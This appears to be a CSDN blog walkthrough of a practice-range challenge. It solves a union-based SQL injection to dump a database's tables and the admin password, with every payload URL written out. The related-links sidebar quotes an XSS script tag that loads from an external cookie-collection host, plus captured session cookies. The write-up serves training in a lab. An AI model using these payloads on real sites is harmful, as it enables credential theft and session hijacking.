封神台靶场 第一章:为了女神小芳 (SQL注入)

最新推荐文章于 2024-03-21 21:29:45 发布
最新推荐文章于 2024-03-21 21:29:45 发布
阅读量1.5k 收藏 5
点赞数 4
分类专栏: 封神台靶场 文章标签: 安全 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/127320025
版权

@封神台 网址 https://hack.zkaq.cn

题目

一、寻找注入点

?id=1 and 1=1  #回显正常

?id=1 and 1=2  #回显异常

 二、查看字段数

?id=1 order by 1,2  #回显正常

?id=1 order by 3 #回显异常

三、判断回显点

       得到回显位置为2 下一步利用联合查询寻找回显点,构造 

?id=1 and 1=2 union select 1,2

四、寻找相关内容

   1.查看版本信息

?id=1 and 1=2 union select 1,version()

2.爆数据库名

?id=1 and 1=2 union select 1,database()

3.爆表名

?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

4.爆字段名

猜测所要的信息在admin表中(admin一般代表用户)

?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

5.获取字段值

?id=1 and 1=2 union select 1,group_concat(username,password) from admin

 

或者用 用户admin,接着查询password密码

?id=1 and 1=2 union select 1,password from admin

最后成功拿取flag hellohack 

总结

本题考查SQL注入的联合查询(union注入)的用法

了解更多SQL注入 点击这里 SQL详解

橙子学不会.
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
神台靶场-第一章:为了女神小芳!【SQL注入攻击原理
红凳子的博客
05-07 1984
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
全!CTF靶场、渗透实战靶场总结 (适合收藏)
Appleteachers的博客
05-20 3万+
CTF靶场、渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯); 渗透实战靶场:挖洞、渗透实战(web、域、横向渗透),适合实战能力需要大幅度提升的同学。 目录 ▶0x01 CTF赛事发布网站 ▶0x02 CTF在线靶场 ▶0x03 漏洞靶场(本地搭建) ▶0x04 渗透实战靶场 0x01 CTF赛事发布网站 i春秋和XCTF社区经常会发布各类CTF赛事 i春秋: https://www.
神台——尤里的复仇Ⅰ 小芳
最新发布
ASD830的博客
03-21 363
我们可以查出“admin“”表里 有 “id” “username” “password” 三个字段。题目说让我们拿到管理员账户的密码,我们看一下username和password字段的内容。尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站。根据提示我们需要浅浅的sql注入一下,首先判断一下是否存在SQL注入漏洞。学过一点黑客技术的他,想在女神面前炫炫技。页面不正常,说明存在SQL注入漏洞。页面出现了2,说明我们的回显位为2。页面不正常,判断出字段数为2。
神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
神台靶场-尤里的复仇-第二章
weixin_58373549的博客
01-29 616
神台靶场-尤里的复仇-第二章:遇到阻难!绕过WAF过滤!【配套课时SQL注入攻击原理 实战演练
Sql注入详解(原理篇)
Naive的博客
09-11 7757
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
注入(一)
tomyyyyy
06-28 272
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
SQL注入各种注入原理|绕过技巧|带实例详解|
BING
03-19 7709
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、报错注入攻击详解(报错注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击SQL注入绕过技术、sql注入修复建议
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
更改支付金额(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
mysql后台注入靶场源码.rar
04-21
该资源为存在漏洞的网站源码,学习web安全的小伙伴可以用来搭建环境做测试用 方法: 上传所有文件到空间根目录下,运行http://你的域名/install进行安装 安装过程遇到的数据库用户名和密码可以咨询空间你的空间商 不需要会员功能可以删除member目录 安装完成后更改admin目录为你的后台目录名,更改后的访问地址为 http://你的域名/修改的后台目录名 安装完成后请及时删除install目录
神台-杂项8:奇怪的短信
03-11
随波逐流工具,一个非常好用的解码工具
ZVuldrill 黑客靶场 附带安装教程
01-26
平台中有10个挑战,包含的漏洞有: ·SQL注入 ·储存型和反射型XSS ·CSRF ·文件包含 ·后台弱口令 ·文件上传 ·目录遍历 ·权限跨越
-:unity开发的FC神榜复刻版
02-13
-- unity开发的FC神榜复刻版
Sql注入基础原理介绍(超详细)
weixin_30325487的博客
09-06 4295
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 二、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Business Logic...
SQL注入原理-字符型注入
T1ngSh0w的博客
09-13 8608
SQL注入原理-字符型注入
尤里的复仇Ⅰ 小芳
HNU凌风的博客
03-10 704
第一章:为了女神小芳! Tips: 通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站 学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门(小芳公司网站). 第一步,判断是否存在sql注入漏洞 在网站后构造?id=1 and 1=1 ,然后回车 页面返回正常 再次构造 ?id=1 and 1=2 然后回车 这里页面返回异常,初步判断这里可能存在一个sql注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 or
SQL注入基础 知识
zhuangsle的博客
08-25 839
 SQL注入基础知识 一、SQL注入原理 (一)注入原理 1、一句话总结 sql注入存在于前后端数据交互中,前端用户输入的数据(或参数)没有经过严格处理,直接交给执行(即带入数据进行相关的操作)。 2、产生原因 后端接受前端用户相关的参数,没有经过严格的处理,就直接带入数据库操作。 3、SQL注入攻击的必要条件 明确web应用程序所使用的技术,例如php+mysql,asp+mssql等; 确定前端提交数据的方式与位
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和实例,帮助读者从初学者成长为能够独立完成三维设计与制作的专业人士。 该书提供了C4D软件的下载地址,读者可以通过该链接下载安装C4D软件到自己的电脑中。安装完成后,读者可以按照书中的指导步骤,逐步学习C4D的操作技巧和基本概念。从最基础的界面介绍、视图操作,到三维模型的建立、材质的添加、动画的制作等各个方面都有详细的讲解和实例演示。 随着阅读的深入,读者将学习到更高级别的技巧和应用,如灯光设置、摄像机调整、特效制作等。作者通过生动的插图和实际案例,使读者能够更好地理解并掌握C4D的使用方法。 "C4D修神记:零基础到三维神"不仅可以帮助读者快速入门C4D软件,还能够启迪读者的创作灵感,提供了丰富的设计思路和技巧。这本书的出版对于有志于学习和从事三维设计的读者来说是一次难得的机会和宝贵的参考资料。无论是对于初学者还是对于有一定基础的人士来说,这本书都能够带领他们迈向更高的技能和创作水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值